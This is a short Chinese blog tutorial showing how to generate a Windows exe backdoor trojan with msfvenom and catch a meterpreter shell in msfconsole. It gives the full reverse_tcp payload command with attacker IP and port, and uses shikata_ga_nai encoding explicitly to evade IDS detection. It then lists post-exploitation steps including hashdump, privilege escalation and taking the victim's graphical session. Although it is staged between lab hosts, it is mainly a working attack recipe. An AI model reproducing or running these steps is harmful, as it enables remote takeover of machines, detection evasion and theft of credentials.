【原创】通过MSFVenom生成exe后门木马拿shell

2016-08-10  本文已影响8298人  Safesonic

工具:msfconsole、msfvenom、Kali Linux

角色分配:攻击者:Kali Linux 2016.1,IP 192.168.1.106;

受害者:Windows Server 2003,IP 192.168.1.101。

思路:通过msfvenom制作exe后门木马,并用shikata_ga_nai编码绕过IDS检测,利用msfconsole连接msfvenom服务并拿shell。

过程:

1.执行以下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe

2.将test.exe复制到受害者主机上


3.在Kali中输入msfconsole,并按照下图进行配置:

4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈:

得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。

上一篇 下一篇

猜你喜欢

热点阅读